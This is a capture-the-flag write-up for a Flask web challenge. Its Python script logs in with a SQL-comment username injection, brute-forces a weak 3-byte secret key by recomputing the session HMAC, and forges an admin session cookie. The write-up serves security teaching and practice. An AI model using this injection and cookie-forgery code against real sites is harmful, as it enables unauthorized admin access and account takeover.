[EN] THE EYE 2

# [EN] THE EYE 2 ###### tags: `Writeup` `Web` `English` > [name=Curious] ## Train Of Thought & Solution If you search a little, you can find a path called `/robots.txt`. Upon entering it, you will discover two paths that appear to be suspiciously disallowed. ![](https://hackmd.io/_uploads/rJOlNiFIh.png) If you try to access `/admin` directly, you will be redirected to the main page. However, if you visit `/admin-dev`, you will find some flask code related to `/admin`. ![](https://hackmd.io/_uploads/ryBHEiFL3.png) By examining how the `session` cookie is generated, the process can be described as follows: ```python= from itsdangerous import base64_encode session_data = base64_encode(b'{"username":"curious"}') session_time = base64_encode(b'<time stamp in bytes>') pre_session = session_data + b'.' + session_time # `secret_key` here is `app.secret_key` key = hmac.new(secret_key, msg=b'cookie-session', digestmod=hashlib.sha1).digest() session_hmac = base64_encode(hmac.new(key, msg=pre_session, digestmod=hashlib.sha1).digest()) session = pre_session + b'.' + session_hmac ``` Since we have the `session` cookie for the user named curious, we can attempt different `app.secret_key` values to calculate curious's `session_hmac`. If the calculated `session_hmac` matches the original session's `session_hmac`, it means we have found the `app.secret_key`. ```python= import requests as req from itertools import product from itsdangerous import base64_decode, base64_encode from tqdm import tqdm import hashlib, hmac def gen_session_hmac(pre_session: bytes, secret_key: bytes): key = hmac.new(secret_key, msg=b'cookie-session', digestmod=hashlib.sha1).digest() return hmac.new(key, msg=pre_session, digestmod=hashlib.sha1).digest() session = req.post('http://lotuxctf.com:20002/login', data={'username': "curious' -- ", 'password': '123'}, allow_redirects=False).headers['Set-Cookie'].split(';')[0].split('=')[1].encode().split(b'.') pre_session = session[0] + b'.' + session[1] right_hmac = base64_decode(session[2]) for new_key in tqdm(product(range(256), repeat=3)): new_key = bytes(new_key) if gen_session_hmac(pre_session, new_key) == right_hmac: secret_key = new_key break new_pre_session = base64_encode('{"username":"admin"}') + b'.' + session[1] session = new_pre_session + b'.' + base64_encode(gen_session_hmac(new_pre_session, secret_key)) print(session) ``` Next, using the discovered `app.secret_key`, calculate a `session` cookie with the value of `session_data` is `base64_encode(b'{"username":"admin"}')`. Replace the existing `session` cookie in the browser with this generated `session` cookie. Then, make a request to `/admin` ![](https://hackmd.io/_uploads/B1JYFoYLh.png) Click on the `Get Flag!` button, and you will be able to obtain the flag {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}